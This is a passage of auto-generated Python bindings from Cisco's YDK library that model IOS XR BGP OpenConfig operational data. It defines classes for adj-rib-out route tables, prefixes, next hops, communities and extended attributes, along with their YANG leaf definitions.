**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-out-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost']['meta_info']
class AdjRibOutPre(_Entity_):
"""
Adjacency rib out\-bound pre\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre, self).__init__()
self.yang_name = "adj-rib-out-pre"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-out-pre"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-out-pre"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
